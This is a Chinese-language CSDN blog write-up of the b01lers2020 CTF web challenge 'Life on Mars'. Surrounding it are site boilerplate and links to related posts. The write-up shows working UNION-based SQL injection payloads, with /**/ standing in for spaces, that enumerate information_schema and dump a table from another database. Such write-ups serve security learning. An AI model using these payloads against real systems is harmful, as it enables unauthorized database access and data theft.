[b01lers2020]Life on Mars (难发现的sql注入)

最新推荐文章于 2023-04-02 21:47:58 发布
最新推荐文章于 2023-04-02 21:47:58 发布
阅读量557 收藏 2
点赞数
分类专栏: sql注入 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/127967409
版权

[b01lers2020]Life on Mars

打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。

到这里只能burp抓个包看看

 

 抓包两个界面发现了get传参,考虑是否存在sql注入

尝试额以后发现只返回了一个1,试一下别的引号闭合

直接union select 1,2#发现出现了回显位

 

这里burp中sql注入不能出现空格,需要用/**/ 或者%20代替

直接进行查询所有的数据库名

search=hesperia_planum/**/union/**/select/**/database(),group_concat(schema_name)/**/from/**/information_schema.schemata#

 

 看一下alien_code数据库

?search=hesperia_planum/**/union/**/select/**/database(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="alien_code"#

发现code表

?search=hesperia_planum/**/union/**/select/**/database(),group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="code"#

 

 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.code#

这里是因为不是当前的数据库,表名前面需要加数据库的前缀

总结:这道题难得不在sql注入,注入没有一点得过滤,最多是绕了个弯在别的数据库的表中,难得是找到sql注入的这个点,一般遇到这种界面就会f12源码查看信息,然后扫目录,最后burp查看一下界面,这种题目一般以xml实体注入较多,这里长个记性。

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 所有挑战都应具有挑战文件,源代码以及编写和/或求解器。 如果没有,请创建一个github问题,我们将修复该问题。 如果您需要更多帮助,请随时与b01lers-ctf discord上的DM创建者联系。 没有承诺,他们会回应,我们很忙。
FZHei-B01.zip
05-13
FZHei-B01字体,windows下 latex 应用字体,利用管理员模式安装即可,成功后可消除相关latex缺少字体报错。
[b01lers2020]Life on Mars
fightte的博客
05-24 850
界面如下,点击可以看到各种信息,讲的是火星上的事物: 扫描一遍,没有发现任何东西: 并没有备份文件,猜测可能是一些框架的注入之类的, 在各页面抓包查看是否有可疑传参: 某一个页面,看到有类似查询的参数: 传参的数据如果是地名,则显示json形式的页面信息,尝试注入: 通过这个形式显示,信息: 尝试: /query?search=amazonis_planitia union select version(),database() 将表名聚合在一起:爆出表名 对了,下面这是最常见的对没有过滤的s..
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2921
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[b01lers2020]Life on Mars 1
m0_73728268的博客
04-02 126
sqlmap
otp_win64_R15B01.rar
08-13
otp_win64_R15B01
otp_win32_R15B01.rar
08-13
otp_win32_R15B01
HN1B01FDW1T1G的技术参数
12-11
产品型号:HN1B01FDW1T1G类型:NPN./PNP集电极-发射集最小雪崩电压Vceo(V):50集电极最大电流Ic(max)(mA):200直流电流增益hFE最小值(dB):200直流电流增益hFE最大值(dB):400最小电流增益带宽乘积Ft(MHz):-封装/温度(℃)...
[b01lers2020]chugga_chugga
qq_39642801的博客
08-02 460
先用GDB运行一下,运行到用户输入后用bt指令查看堆栈情况,得知main函数位置 用IDA打开main函数,从中可以大致得知变量所代表的含义 用个带行号的文本编辑器进行填充,发现flag中只有一部分是以明文形式给出(X,Y代表字符相同) pctf{s4d_cXXYY4_nXXzXz} 直接暴力求解 ...
CTF逆向-[b01lers2020]chugga_chugga-go语言逆向反编译后发现条件判断,使用z3约束求解
serfend's blog
05-04 1732
CTF逆向-[b01lers2020]chugga_chugga-go语言逆向反编译后发现条件判断,使用z3约束求解 来源:https://buuoj.cn/ 内容: 附件:链接:https://pan.baidu.com/s/1IcjTPjpUQf_oLFiJil8X7Q?pwd=lnl8 提取码:lnl8 答案:pctf{s4d_chugg4_n01zez} 总体思路 发现是go 耐心地将约束一个一个加入到脚本中 运行得到flag 详细步骤 查看文件内容 使用ida7.7版本打开,发现
[b01lers2020]Welcome to Earth
shinygod的博客
04-09 301
知识点:全排列 开局就是不停的向下找,例如这边能发现/chase/,那就进入/chase/ 由于/chase/跳转的有点快我们可以抓个包看一下,又看到一个/leftt/,然后一步一步下去 直到/fight/ // Run to scramble original flag //console.log(scramble(flag, action)); function scramble(flag, key) { for (var i = 0; i < key.length; i++) {
BUUCTF:[b01lers2020]image_adjustments
末初的CSDN博客
04-21 1124
https://buuoj.cn/challenges#[b01lers2020]image_adjustments https://github.com/b01lers/b01lers-ctf-2020/tree/master/misc/image_adjustments adjust.py #!/usr/bin/env python3 from PIL import Image from random import randint import sys f = './flag.png' im
[b01lers2020]Welcome to Earth(python)
D.MIND 的博客
04-25 712
考察:写脚本 又来一道考察编写python脚本的题目。。当然也可以不用python编写 一开始反转就是不断地抓包看源码,最后到/fight/这里时: 就是对些字符串进行全排列,不过很明显pctf{hey_boys是开头,以}结尾的 itertools.permutations():就是返回可迭代对象的所有数学全排列方式 itertools.permutations()它以任意迭代作为参数,并始终返回生成元组的迭代器。它没有(也不应该)特殊的字符串。要获得字符串列表,您可以自己加入元组: list(ma
将’B01’号仓库的面积扩大20%sql
最新发布
05-20
那么可以使用以下SQL语句将B01号仓库的面积扩大20%: ``` UPDATE warehouse SET area = area * 1.2 WHERE id = 'B01'; ``` 这个语句会把B01号仓库的面积乘以1.2(即增加20%),然后将结果更新回数据库中。请注意,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值